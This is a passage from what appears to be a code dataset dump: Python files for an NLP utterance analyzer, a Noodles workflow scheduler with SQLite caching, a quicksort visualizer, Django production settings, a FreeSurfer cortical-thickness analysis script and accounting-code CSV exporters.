Analyzer Subclass\n \"\"\"\n\n forest = chat.last_utterance.parsed_tree\n\n if not forest:\n print(\"unparsed input\")\n #raise Exception(\"Ungrammatical Input\") #TODO\n\n for tree in forest:\n sentence_type = tree[0].label()\n\n if sentence_type == 'S':\n return StatementAnalyzer.analyze(chat)\n elif sentence_type == 'Q':\n return QuestionAnalyzer.analyze(chat)\n else:\n print(\"Error: \", sentence_type)\n\n '''\n if chat.last_utterance.tokens:\n first_token = chat.last_utterance.tokens[0]\n\n question_words = Analyzer.GRAMMAR['question words'].keys()\n to_be = Analyzer.GRAMMAR['to be'].keys()\n modal_verbs = Analyzer.GRAMMAR['modal_verbs']\n\n question_cues = question_words + to_be + modal_verbs\n\n # Classify Utterance as Question / Statement\n if first_token in question_cues:\n return QuestionAnalyzer.analyze(chat)\n else:\n return StatementAnalyzer.analyze(chat)\n else:\n raise ValueError(\"Utterance should have at least one element\")\n '''\n\n @property\n def log(self):\n \"\"\"\n Returns\n -------\n log: logging.Logger\n \"\"\"\n return self._log\n\n 
@property\n def chat(self):\n \"\"\"\n Returns\n -------\n chat: Chat\n Chat to be analyzed\n \"\"\"\n return self._chat\n\n @property\n def utterance_type(self):\n \"\"\"\n Returns\n -------\n utterance_type: UtteranceType\n Utterance Type\n \"\"\"\n raise NotImplementedError()\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n raise NotImplementedError()\n\n @property\n def template(self):\n \"\"\"\n Returns\n -------\n template: dict or None\n \"\"\"\n\n # TODO: Implement here!\n\n return None\n\n\nclass StatementAnalyzer(Analyzer):\n \"\"\"Abstract StatementAnalyzer Object: call StatementAnalyzer.analyze(utterance) factory function\"\"\"\n\n @staticmethod\n def analyze(chat):\n \"\"\"\n StatementAnalyzer factory function\n\n Find appropriate StatementAnalyzer for this utterance\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n\n Returns\n -------\n analyzer: StatementAnalyzer\n Appropriate StatementAnalyzer Subclass\n \"\"\"\n\n\n return GeneralStatementAnalyzer(chat)\n\n @property\n def utterance_type(self):\n \"\"\"\n Returns\n -------\n utterance_type: UtteranceType\n Utterance Type (Statement)\n \"\"\"\n return UtteranceType.STATEMENT\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n raise NotImplementedError()\n\n\nclass GeneralStatementAnalyzer(StatementAnalyzer):\n def __init__(self, chat):\n \"\"\"\n General Statement Analyzer\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n \"\"\"\n\n super(GeneralStatementAnalyzer, self).__init__(chat)\n\n rdf = {'predicate': '', 'subject': '', 'object': ''}\n position = 0\n dict = {}\n\n for tree in chat.last_utterance.parsed_tree[0]:\n for branch in tree:\n for node in branch:\n\n if len(node.leaves())>1:\n for n in node.leaves():\n print ('n ', n)\n\n position += 1\n\n #print(node.label(), node.leaves()[0])\n if node.label().startswith('V') and \\\n (node.leaves()[0].lower() in self.GRAMMAR['verbs'] or node.leaves()[0].lower()[:-1] in\n self.GRAMMAR['verbs'] or node.leaves()[0].lower() in self.GRAMMAR['to be']):\n rdf['predicate'] += node.leaves()[0] + ' '\n\n elif node.leaves()[0]=='from':\n if rdf['predicate'].strip() in self.GRAMMAR['to be']:\n rdf['predicate'] = 'is_from'\n\n elif node.leaves()[0].lower() in self.GRAMMAR['pronouns'] and position < len(\n chat.last_utterance.tokens):\n rdf['subject'] += node.leaves()[0] + ' '\n dict['pronoun'] = self.GRAMMAR['pronouns'][node.leaves()[0].lower()]\n rdf['subject'] = utils.fix_pronouns(dict, self.chat.speaker)\n\n elif node.label().startswith('N') and position == len(chat.last_utterance.tokens):\n rdf['object'] += node.leaves()[0] + ' '\n\n\n\n\n for el in rdf:\n rdf[el] = rdf[el].strip()\n\n if rdf['object'].lower() in self.GRAMMAR['pronouns']:\n dict['pronoun'] = self.GRAMMAR['pronouns'][node.leaves()[0].lower()]\n rdf['object'] = utils.fix_pronouns(dict, self.chat.speaker)\n\n print(rdf)\n self._rdf = rdf\n\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n return self._rdf\n\n\nclass ObjectStatementAnalyzer(StatementAnalyzer):\n def __init__(self, chat):\n \"\"\"\n Object Statement Analyzer\n\n Parameters\n ----------\n chat: Chat\n \"\"\"\n\n super(ObjectStatementAnalyzer, self).__init__(chat)\n\n # TODO: Implement Chat -> RDF\n\n self._rdf = {}\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n return self._rdf\n\n\nclass QuestionAnalyzer(Analyzer):\n \"\"\"Abstract QuestionAnalyzer Object: 
call QuestionAnalyzer.analyze(utterance) factory function\"\"\"\n\n @staticmethod\n def analyze(chat):\n \"\"\"\n QuestionAnalyzer factory function\n\n Find appropriate QuestionAnalyzer for this utterance\n\n Parameters\n ----------\n chat: Chat\n Chat to be analyzed\n\n Returns\n -------\n analyzer: QuestionAnalyzer\n Appropriate QuestionAnalyzer Subclass\n \"\"\"\n if chat.last_utterance.tokens:\n first_word = chat.last_utterance.tokens[0]\n if first_word.lower() in Analyzer.GRAMMAR['question words']:\n return WhQuestionAnalyzer(chat)\n else:\n return VerbQuestionAnalyzer(chat)\n\n @property\n def utterance_type(self):\n \"\"\"\n Returns\n -------\n utterance_type: UtteranceType\n Utterance Type (Question)\n \"\"\"\n return UtteranceType.QUESTION\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n raise NotImplementedError()\n\n\nclass WhQuestionAnalyzer(QuestionAnalyzer):\n def __init__(self, chat):\n \"\"\"\n Wh-Question Analyzer\n\n Parameters\n ----------\n chat: Chat\n \"\"\"\n\n super(WhQuestionAnalyzer, self).__init__(chat)\n\n rdf = {'predicate': '', 'subject': '', 'object': ''}\n position = 0\n dict = {}\n\n for tree in chat.last_utterance.parsed_tree[0]:\n for branch in tree:\n for node in branch:\n for leaf in node.leaves():\n\n position += 1\n #print(node.label(), leaf)\n\n if node.label().startswith('V') and \\\n (leaf.lower() in self.GRAMMAR['verbs'] or leaf.lower()[:-1]in self.GRAMMAR['verbs']):\n rdf['predicate'] += leaf + ' '\n\n elif leaf.lower() in self.GRAMMAR['pronouns'] and position < len(chat.last_utterance.tokens):\n rdf['subject'] += leaf + ' '\n dict['pronoun'] = self.GRAMMAR['pronouns'][leaf.lower()]\n\n elif node.label().startswith('N') and position == len(chat.last_utterance.tokens):\n rdf['object'] += leaf + ' '\n\n elif leaf.lower()=='from':\n rdf['predicate']='is_from'\n\n for el in rdf:\n rdf[el] = rdf[el].strip()\n\n if 'pronoun' in dict:\n rdf['subject'] = utils.fix_pronouns(dict, self.chat.speaker)\n\n print(rdf)\n\n self._rdf = rdf\n\n @property\n def rdf(self):\n \"\"\"\n Returns\n -------\n rdf: dict or None\n \"\"\"\n return self._rdf\n\n\nclass VerbQuestionAnalyzer(QuestionAnalyzer):\n def __init__(self, chat):\n \"\"\"\n Verb Question Analyzer\n\n Parameters\n ----------\n chat: Chat\n \"\"\"\n\n super(VerbQuestionAnalyzer, self).__init__(chat)\n\n rdf = {'predicate': '', 'subject':'', 'object':''}\n position = 0\n dict = {}\n\n for tree in chat.last_utterance.parsed_tree[0]:\n for branch in tree:\n for node in branch:\n position += 1\n #print(node.label(), node.leaves()[0])\n if node.label().startswith('V') and node.leaves()[0].lower() in self.GRAMMAR['verbs']:\n rdf['predicate']+=node.leaves()[0]+' '\n\n elif node.leaves()[0].lower() in self.GRAMMAR['pronouns'] and position> pass_job\n\n return S.run(W, get_workflow(wf))\n\n\ndef start_job(db):\n \"\"\"Adds a time stamp to the database.\"\"\"\n @pull\n def start_job_f(source):\n for key, job in source():\n db.add_time_stamp(key, 'start')\n yield key, job\n\n return start_job_f\n\n\n@sink_map\ndef print_result(key, status, result, msg):\n print(status, result)\n\n\ndef schedule_job(results, registry, db,\n job_keeper=None, pred=lambda job: True):\n \"\"\"Schedule a job, providing there is no result for it in the database yet.\n\n First the database checks if there is a previous job that is identical to\n the current one. 
If this is the case, the result is 'retrieved'.\n\n If there is no result, but the job description is in the database, either\n the job is still running, or it was tried before but Noodles crashed.\n\n In the first case, the job is 'attached' to the already running job.\n In the second case, the record of the previous job is deleted and the new\n job is scheduled.\n \"\"\"\n @push\n def schedule_f(job_sink_):\n job_sink = job_sink_()\n result_sink = results.sink()\n\n while True:\n key, job = yield\n\n if pred(job):\n job_msg = registry.deep_encode(job)\n prov = prov_key(job_msg)\n\n if db.job_exists(prov):\n status, other_key, result = db.get_result_or_attach(\n key, prov, job_keeper)\n if status == 'retrieved':\n result_sink.send(\n (key, 'retrieved',\n registry.deep_decode(result, deref=True), None))\n continue\n elif status == 'attached':\n continue\n elif status == 'broken':\n db.new_job(key, prov, job_msg)\n job_sink.send((key, job))\n\n else:\n db.new_job(key, prov, job_msg)\n job_sink.send((key, job))\n\n else:\n job_sink.send((key, job))\n\n return schedule_f\n\n\ndef store_result_deep(registry, db, job_keeper=None, pred=lambda job: True):\n \"\"\"When the result is known, we can insert it in the database. This is\n only done if the result is not a workflow. If the result is a workflow,\n a 'link' is added in the database, identifying the workflow by the Python\n `id` of the workflow object. When this workflow is finished the final\n result is inserted in the database.\"\"\"\n def store_result(key, result, msg):\n result_msg = registry.deep_encode(result)\n attached = db.store_result(key, result_msg)\n if attached:\n for akey in attached:\n yield ResultMessage(akey, 'attached', result, msg)\n\n @pull\n def f(source):\n for key, status, result, msg in source():\n wf, n = job_keeper[key]\n job = wf.nodes[n]\n\n if pred(job):\n if is_workflow(result):\n db.add_link(key, id(get_workflow(result)))\n else:\n yield from store_result(key, result, msg)\n\n if wf.root == n:\n linked_jobs = db.get_linked_jobs(id(wf))\n\n if is_workflow(result):\n for k in linked_jobs:\n db.add_link(k, id(get_workflow(result)))\n\n else:\n for k in linked_jobs:\n yield from store_result(k, result, msg)\n\n yield ResultMessage(key, status, result, msg)\n\n return f\n\n\ndef run_parallel(wf, n_threads, registry, jobdb_file, job_keeper=None):\n \"\"\"Run a workflow in `n_threads` parallel threads. 
Now we replaced the\n single worker with a thread-pool of workers.\n\n This version works with the JobDB to cache results.\"\"\"\n registry = registry()\n db = JobDB(jobdb_file)\n\n if job_keeper is None:\n job_keeper = JobKeeper()\n S = Scheduler(job_keeper=job_keeper)\n\n jobs = Queue()\n results = Queue()\n\n assert job_keeper is not None\n\n LogQ = Queue()\n threading.Thread(\n target=patch,\n args=(LogQ.source, job_keeper.message),\n daemon=True).start()\n\n @push_map\n def log_job_start(key, job):\n return (key, 'start', job, None)\n\n r_src = jobs.source \\\n >> start_job(db) \\\n >> branch(log_job_start >> LogQ.sink) \\\n >> thread_pool(*repeat(worker, n_threads), results=results) \\\n >> store_result_deep(registry, db, job_keeper) \\\n >> branch(LogQ.sink)\n\n j_snk = schedule_job(results, registry, db, job_keeper) >> jobs.sink\n\n return S.run(Connection(r_src, j_snk), get_workflow(wf))\n\n\ndef create_prov_worker(\n worker, results, registry, jobdb_file, job_keeper,\n pred=lambda x: True, log_q=None):\n registry = registry()\n db = JobDB(jobdb_file)\n\n jobs = Queue()\n\n r_src = jobs.source \\\n >> start_job(db) \\\n >> worker \\\n >> store_result_deep(registry, db, job_keeper, pred)\n\n @push_map\n def log_job_sched(key, job):\n return (key, 'schedule', job, None)\n\n j_snk = broadcast(\n log_job_sched >> log_q.sink,\n schedule_job(results, registry, db, job_keeper, pred) >> jobs.sink)\n\n return Connection(r_src, j_snk)\n\n\ndef prov_wrap_connection(\n worker, results, registry, jobdb_file, job_keeper,\n pred=lambda x: True, log_q=None):\n registry = registry()\n db = JobDB(jobdb_file)\n\n r_src = worker.source \\\n >> store_result_deep(registry, db, job_keeper, pred)\n\n @push_map\n def log_job_sched(key, job):\n return (key, 'schedule', job, None)\n\n j_snk = broadcast(\n log_job_sched >> log_q.sink,\n schedule_job(results, registry, db, job_keeper, pred) >> worker.sink)\n\n return Connection(r_src, j_snk)\n\n\ndef run_parallel_opt(wf, n_threads, registry, jobdb_file,\n job_keeper=None, display=None, cache_all=False):\n \"\"\"Run a workflow in `n_threads` parallel threads. Now we replaced the\n single worker with a thread-pool of workers.\n\n This version works with the JobDB to cache results; however we only store\n the jobs that are hinted with the 'store' keyword.\n\n :param wf:\n The workflow.\n\n :param n_threads:\n The number of threads to start.\n\n :param registry:\n The serialisation to use in order to store results in the database,\n as well as identify jobs.\n\n :param jobdb_file:\n The filename of the job database.\n\n :param job_keeper:\n The JobKeeper instance to keep runtime information in. If not given,\n we create one for you and throw it in the trash when we're done.\n\n :param display:\n The display routine to display activity. 
If not given, we won't report\n on any activity.\n \"\"\"\n if job_keeper is None:\n job_keeper = JobKeeper()\n S = Scheduler(job_keeper=job_keeper)\n\n results = Queue()\n\n if cache_all:\n def pred(job):\n return True\n else:\n def pred(job):\n return job.hints and 'store' in job.hints\n\n LogQ = Queue()\n if display:\n tgt = broadcast(job_keeper.message, sink_map(display))\n else:\n tgt = job_keeper.message\n\n threading.Thread(\n target=patch,\n args=(LogQ.source, tgt),\n daemon=True).start()\n\n parallel_worker = \\\n thread_pool(*repeat(worker, n_threads), results=results) >> \\\n branch(LogQ.sink)\n\n return S.run(\n create_prov_worker(\n parallel_worker, results, registry, jobdb_file, job_keeper,\n pred, LogQ),\n get_workflow(wf))\n","sub_path":"noodles/run/run_with_sqlite.py","file_name":"run_with_sqlite.py","file_ext":"py","file_size_in_byte":9405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"141170256","text":"import time\nfrom Swap import _swap\n\n\ndef find_pivot(data_list, start, end):\n \"\"\"\n Finds the pivot value with in the sub list using the median of three method\n Expected Complexity: O(1) (time and space)\n\n :param data_list: Python list to find the pivot value in\n :param start: Integer for the starting index within the list\n :param end: Integer for the ending index within the list\n\n :return: Integer for the pivot value found using the median of three method\n \"\"\"\n\n # pull the first, middle, and last values in the sublist\n first = data_list[start]\n middle = data_list[(start + end) // 2]\n last = data_list[end]\n\n # this was done so that it could be done in constant time\n if (middle <= first <= last) or (last <= first <= middle):\n return first\n\n elif (first <= middle <= last) or (last <= middle <= first):\n return middle\n\n elif (first <= last <= middle) or (middle <= last <= first):\n return last\n\n\ndef partition(data_list, start, end, draw_data, time_value):\n \"\"\"\n Partitions the sub list and visualizes the steps\n Expected Complexity: O(n) (time) and O(1) (space)\n\n :param data_list: Python list to be partitioned\n :param start: Integer for the starting index in the list\n :param end: Integer for the ending index in the list\n :param draw_data: Function written in main.py that visualizes the list\n :param time_value: Float based on the input for time between steps\n\n :return: Integer for the index of the pivot value after the partition\n \"\"\"\n pivot_value = find_pivot(data_list, start, end)\n\n i = start - 1\n\n for j in range(start, end + 1):\n\n # moves each value that is less than the pivot to the left\n if data_list[j] < pivot_value:\n i += 1\n _swap(data_list, i, j)\n\n # generate the color list to be visualized\n color_list = [\"red\" for x in range(len(data_list))]\n\n # color the values being swapped green\n for x in range(len(color_list)):\n if (x == i) or (x == j):\n color_list[x] = \"green\"\n\n # visualizes the list and wait for the specified amount of time\n draw_data(data_list, color_list)\n time.sleep(time_value)\n\n i += 1\n\n # does one last swap to move the pivot value in the right spot\n swap_index = data_list.index(pivot_value)\n _swap(data_list, i, swap_index)\n\n # generate the color list to be visualized\n color_list = [\"red\" for x in range(len(data_list))]\n\n # color the values being swapped green\n for x in range(len(color_list)):\n if (x == i) or (x == swap_index):\n color_list[x] = \"green\"\n\n # visualizes the list and wait for the specified 
amount of time\n draw_data(data_list, color_list)\n time.sleep(time_value)\n\n return i\n\n\ndef quick_sort(data_list, start, end, draw_data, time_value):\n \"\"\"\n Does a quick sort on the list and visualizes the steps\n Expected Complexity (Sort only): O(n*log(n)) (time) and O(log(n)) (space, recursion stack)\n\n :param data_list: Python list to be sorted\n :param start: Integer of the starting index in the list\n :param end: Integer of the ending index in the list\n :param draw_data: Function written in main.py to visualize the list\n :param time_value: Float based on the input for the time between steps\n \"\"\"\n # stop when the start and end index are equal (or when start > end)\n if start >= end:\n return\n\n pivot_index = partition(data_list, start, end, draw_data, time_value)\n\n # sorting the first half of the data; the pivot at pivot_index is already\n # in its final spot, so it is excluded from both recursive calls\n quick_sort(data_list, start, pivot_index - 1, draw_data, time_value)\n\n # sorting the second half of the data\n quick_sort(data_list, pivot_index + 1, end, draw_data, time_value)\n\n # color the whole list green after the sort\n draw_data(data_list, [\"green\" for i in range(len(data_list))])\n","sub_path":"gui_based_sorts/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"164363724","text":"\"\"\"\nCopyright 2017 Peter Urda\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport os\n\n# noinspection PyUnresolvedReferences\nfrom .base import * # noqa\n\nALLOWED_HOSTS = [\n 'mrbutler.urda.cc'\n]\n\nINSTALLED_APPS = [\n 'raven.contrib.django.raven_compat',\n] + INSTALLED_APPS # noqa\n\nCSRF_COOKIE_HTTPONLY = True\nCSRF_COOKIE_SECURE = True\nSECURE_BROWSER_XSS_FILTER = True\nSECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_HSTS_INCLUDE_SUBDOMAINS = True\nSECURE_HSTS_SECONDS = 86400\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nX_FRAME_OPTIONS = 'DENY'\n\nRAVEN_CONFIG = {\n 'dsn': os.environ['SENTRY_DSN'],\n 'release': os.environ['SOURCE_VERSION'],\n}\n","sub_path":"web/core/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"280448023","text":"from pathlib import *\nimport pandas as pd\nimport numpy as np\nimport os, six\nimport mne\nimport nibabel as nib\nimport math\nimport statsmodels as sm\nimport csv\nfrom scipy import stats as ss\nimport mmimproc # the module itself is referenced below as mmimproc.fs_local\nfrom mmimproc.utils import run_subprocess, WorkingContext\nfrom mmimproc.utils.paths import getnetworkdataroot\nfs = mmimproc.fs_local\nproject = 'bbc'\n# first set up the 3 cortical thickness dataframes as input\ncontrl_sid = ['sub-bbc209', 'sub-bbc211', 'sub-bbc208', 'sub-bbc202', 'sub-bbc249', 'sub-bbc241', 'sub-bbc243', 'sub-bbc231', 'sub-bbc253']\nfoster_sid = ['sub-bbc101', 'sub-bbc105', 'sub-bbc106', 'sub-bbc108', 'sub-bbc113', 'sub-bbc116', 'sub-bbc118', 'sub-bbc119', 'sub-bbc120']\nlh_ct = 
pd.DataFrame.from_csv(str(fs/project/'grp_parc_stats_lh_cortical_thickness.csv'), index_col=None)\nrh_ct = pd.DataFrame.from_csv(str(fs/project/'grp_parc_stats_rh_cortical_thickness.csv'), index_col=None)\n\n\nlh_ct['Subjid'] = lh_ct['lh.aparc.a2009s.thickness'].str.partition('/').drop([2,1], axis=1)\nlh_ct = lh_ct.set_index(['Subjid'])\nlh_ct = lh_ct.drop('lh.aparc.a2009s.thickness', axis=1)\nlh_ct = lh_ct.transpose().astype('float')\nrh_ct['Subjid'] = rh_ct['rh.aparc.a2009s.thickness'].str.partition('/').drop([2,1], axis=1)\nrh_ct = rh_ct.set_index(['Subjid'])\nrh_ct = rh_ct.drop('rh.aparc.a2009s.thickness', axis=1)\nrh_ct = rh_ct.transpose().astype('float')\n\n\nlh_ct_ctrl = lh_ct[contrl_sid]\nlh_ct_fost = lh_ct[foster_sid]\nlh_ct['209-101'] = lh_ct['sub-bbc209'] - lh_ct['sub-bbc101']\nlh_ct['211-105'] = lh_ct['sub-bbc211'] - lh_ct['sub-bbc105']\nlh_ct['208-106'] = lh_ct['sub-bbc208'] - lh_ct['sub-bbc106']\nlh_ct['202-108'] = lh_ct['sub-bbc202'] - lh_ct['sub-bbc108']\nlh_ct['249-113'] = lh_ct['sub-bbc249'] - lh_ct['sub-bbc113']\nlh_ct['241-116'] = lh_ct['sub-bbc241'] - lh_ct['sub-bbc116']\nlh_ct['243-118'] = lh_ct['sub-bbc243'] - lh_ct['sub-bbc118']\nlh_ct['231-119'] = lh_ct['sub-bbc231'] - lh_ct['sub-bbc119']\nlh_ct['253-120'] = lh_ct['sub-bbc253'] - lh_ct['sub-bbc120']\nlh_paired_sub = lh_ct[['209-101', '211-105', '208-106', '202-108', '249-113', '241-116', '243-118', '231-119', '253-120']]\nlh_paired_sub = lh_paired_sub.transpose()\n\nlh_ct_stats = lh_paired_sub.apply(ss.ttest_1samp, axis=0, args=(0.0,)).apply(pd.Series)\nlh_ct_stats.columns = ['lh-tstat', 'lh-p-value']\nlh_ct_stats.index.name = 'Region'\n## leave region names alone to match with thickness files\n# lh_ct_stats['Region'] = lh_ct_stats.index.str.replace('lh_', '').str.replace('_thickness', '')\n#lh_sig_results = lh_ct_stats[lh_ct_stats['lh-p-value'] <= 0.05].sort_values(by='lh-p-value')\n#lh_sig_results.set_index('Region')\n\nrh_ct['209-101'] = rh_ct['sub-bbc209'] - rh_ct['sub-bbc101']\nrh_ct['211-105'] = rh_ct['sub-bbc211'] - rh_ct['sub-bbc105']\nrh_ct['208-106'] = rh_ct['sub-bbc208'] - rh_ct['sub-bbc106']\nrh_ct['202-108'] = rh_ct['sub-bbc202'] - rh_ct['sub-bbc108']\nrh_ct['249-113'] = rh_ct['sub-bbc249'] - rh_ct['sub-bbc113']\nrh_ct['241-116'] = rh_ct['sub-bbc241'] - rh_ct['sub-bbc116']\nrh_ct['243-118'] = rh_ct['sub-bbc243'] - rh_ct['sub-bbc118']\nrh_ct['231-119'] = rh_ct['sub-bbc231'] - rh_ct['sub-bbc119']\nrh_ct['253-120'] = rh_ct['sub-bbc253'] - rh_ct['sub-bbc120']\nrh_paired_sub = rh_ct[['209-101', '211-105', '208-106', '202-108', '249-113', '241-116', '243-118', '231-119', '253-120']]\nrh_paired_sub = rh_paired_sub.transpose()\n\nrh_ct_stats = rh_paired_sub.apply(ss.ttest_1samp, axis=0, args=(0.0,)).apply(pd.Series)\nrh_ct_stats.columns = ['rh-tstat', 'rh-p-value']\nrh_ct_stats.index.name = 'Region'\n## leave region names alone to match with thickness files\n# rh_ct_stats['Region'] = rh_ct_stats.index.str.replace('rh_', '').str.replace('_thickness', '')\n# rh_sig_results = rh_ct_stats[rh_ct_stats['rh-p-value'] <= 0.05].sort_values(by='rh-p-value')\n# rh_sig_results.set_index('Region')\n# # merge stat results\n# rh_sig_results.merge(lh_sig_results, left_on='Region', right_on='Region', how='outer').fillna('').set_index('Region').sort_values(['rh-p-value', 'lh-p-value'])\n\n# read in verticees to test against derived from freesurfer mri_annotation2label such as\n# mri_annotation2label --subject template_hires_br_freesurf_v6 --hemi lh --annotation aparc.a2009s --outdir test\nlabel_dir = fs / project / 'reg' / 
'ants_vbm_pairedLH_in_template_space' / 'template_hires_br_freesurf_v6' / 'label' / 'test'\nlabel_flist = label_dir.glob('*.label')\nall_labels = {}\nfor label_fname in label_flist:\n label = 'ctx_' + str(label_fname.name).replace('.label', '').replace('.', '_')\n all_labels[label] = []\n reader = csv.reader(open(str(label_fname)), skipinitialspace=True, delimiter=' ')\n #skip 1st 2 lines\n next(reader, None)\n next(reader, None)\n for row in reader:\n all_labels[label].append(int(row[0]))\n\n# read, find region, replace, write new thickness file\nlh_ct_fname = fs/project/'reg'/'ants_vbm_pairedLH_in_template_space'/'template_hires_br_freesurf_v6'/'surf'/'lh.thickness.asc'\nlh_contrl_mean_ct_fname = lh_ct_fname.parent/'lh.control_mean_thickness.asc'\nlh_fost_mean_ct_fname = lh_ct_fname.parent/'lh.foster_mean_thickness.asc'\nlh_mean_diff_ct_fname = lh_ct_fname.parent/'lh.mean_diff_thickness.asc'\nlh_ct_tstat_fname = lh_ct_fname.parent/'lh.tstat_thickness.asc'\nlh_ct_1minp_fname = lh_ct_fname.parent/'lh.1minp_thickness.asc'\n\nwith open(str(lh_ct_fname), 'rb') as lh_ct , open(str(lh_contrl_mean_ct_fname), 'wb') as lh_contrl_mean_ct , \\\n open(str(lh_fost_mean_ct_fname), 'wb') as lh_fost_mean_ct, \\\n open(str(lh_mean_diff_ct_fname), 'wb') as lh_mean_diff_ct, \\\n open(str(lh_ct_tstat_fname), 'wb') as lh_ct_tstat, \\\n open(str(lh_ct_1minp_fname), 'wb') as lh_ct_1minp:\n reader = csv.reader(lh_ct, skipinitialspace=True, delimiter=' ')\n cntrl_writer = csv.writer(lh_contrl_mean_ct, delimiter=' ')\n foster_writer = csv.writer(lh_fost_mean_ct, delimiter=' ')\n diff_writer = csv.writer(lh_mean_diff_ct, delimiter=' ')\n tstat_writer = csv.writer(lh_ct_tstat, delimiter=' ')\n _1minp_writer = csv.writer(lh_ct_1minp, delimiter=' ')\n for row in reader:\n # get vertex\n vert = int(row[0])\n # get region\n region = [k for k, v in all_labels.items() if vert in v][0]\n if region == '':\n cntrl_thickn = [2.785]\n foster_thickn = [2.7127]\n diff_thickn = [0.0732]\n tstat_thickn = [0]\n _1minp_thickn = [0]\n else:\n # convert cortical region name to cortical thickness name\n region = region.replace('ctx_', '') + '_thickness'\n # get thickness info\n try:\n cntrl_thickn = [round(lh_ct_ctrl.mean(axis=1)[region], 5)]\n foster_thickn = [round(lh_ct_fost.mean(axis=1)[region], 5)]\n diff_thickn = [round(lh_paired_sub.mean(axis=0).loc[region], 5)]\n tstat_thickn = [round(lh_ct_stats.loc[region, 'lh-tstat'], 5)]\n _1minp_thickn = [round(1 - lh_ct_stats.loc[region, 'lh-p-value'], 5)]\n except:\n cntrl_thickn = [2.785]\n foster_thickn = [2.7127]\n diff_thickn = [0.0732]\n tstat_thickn = [0]\n _1minp_thickn = [0]\n print('exception caught in region '+region+' for vertice number '+str(vert))\n # replace orig row values with stats\n new_ctrl_row = row[:4] + cntrl_thickn\n new_foster_row = row[:4] + foster_thickn\n new_diff_row = row[:4] + diff_thickn\n new_tstat_row = row[:4] + tstat_thickn\n new_1minp_row = row[:4] + _1minp_thickn\n # write new rows to files\n cntrl_writer.writerow(new_ctrl_row)\n foster_writer.writerow(new_foster_row)\n diff_writer.writerow(new_diff_row)\n tstat_writer.writerow(new_tstat_row)\n _1minp_writer.writerow(new_1minp_row)\n\n# use freesurfer mris_convert to convert back to curv file\nresults = ()\nwith WorkingContext(str(lh_ct_fname.parent)):\n for ct_file in [lh_contrl_mean_ct_fname, lh_fost_mean_ct_fname, lh_mean_diff_ct_fname, lh_ct_tstat_fname, lh_ct_1minp_fname]:\n cmd = ['mris_convert', '-c', str(ct_file), str(ct_file.parent)+'/lh.orig']\n cmd += 
[str(ct_file.parent)+'/'+str(ct_file.stem).replace('_thickness', '.thickness')]\n cmd = ' '.join(cmd)\n results += run_subprocess(cmd)\n","sub_path":"mmimproc/projects/bbc/struc/freesurf_cort_thick.py","file_name":"freesurf_cort_thick.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"75731969","text":"from treasuryCOA.export_csv import (\n EXPORT_L5_FIELD_ITERATOR_HEADERS,\n EXPORT_L5_HIERARCHY_ITERATOR_HEADERS,\n l5_field_obj,\n l5_hierarchy_obj,\n)\n\nEXPORT_NAC_ITERATOR_HEADERS = (\n EXPORT_L5_HIERARCHY_ITERATOR_HEADERS\n + [\"Level 6\", \"Level 6 Description\"]\n + EXPORT_L5_FIELD_ITERATOR_HEADERS\n + [\n \"Used for budget\",\n \"Budget Grouping\",\n \"Budget Category\",\n \"Commercial Category\",\n \"Operational Delivery Plan\",\n \"Prime NAC\",\n \"Active\",\n ]\n)\n\n\ndef _export_nac_iterator(queryset):\n yield EXPORT_NAC_ITERATOR_HEADERS\n\n for obj in queryset:\n yield l5_hierarchy_obj(obj.account_L5_code) + [\n obj.natural_account_code,\n obj.natural_account_code_description,\n ] + l5_field_obj(obj.account_L5_code) + [\n obj.used_for_budget,\n obj.expenditure_category.NAC_category.NAC_category_description\n if obj.expenditure_category\n else \"-\",\n obj.expenditure_category.grouping_description\n if obj.expenditure_category\n else \"-\",\n obj.commercial_category.commercial_category\n if obj.commercial_category\n else \"N/A\",\n obj.expenditure_category.op_del_category.operating_delivery_description\n if obj.expenditure_category and obj.expenditure_category.op_del_category\n else \"N/A\",\n obj.expenditure_category.linked_budget_code.natural_account_code\n if obj.expenditure_category\n else \"-\",\n obj.active,\n ]\n\n\ndef _export_historical_nac_iterator(queryset):\n yield [\n \"Level 6\",\n \"Level 6 Description\",\n \"used for budget\",\n \"Budget Category\",\n \"Budget Grouping\",\n \"Commercial Category\",\n \"account L5 code\",\n \"account L5 description\",\n \"Prime NAC\",\n \"L5 for OSCAR upload\",\n \"Expenditure Type\",\n \"active\",\n \"financial year\",\n \"archived\",\n ]\n for obj in queryset:\n yield [\n obj.natural_account_code,\n obj.natural_account_code_description,\n obj.used_for_budget,\n obj.expenditure_category.grouping_description\n if obj.expenditure_category\n else \"-\",\n obj.NAC_category,\n obj.commercial_category,\n obj.account_L5_code,\n obj.account_L5_description,\n obj.account_L6_budget,\n obj.account_L5_code_upload,\n obj.economic_budget_code,\n obj.active,\n obj.financial_year.financial_year_display,\n obj.archived,\n 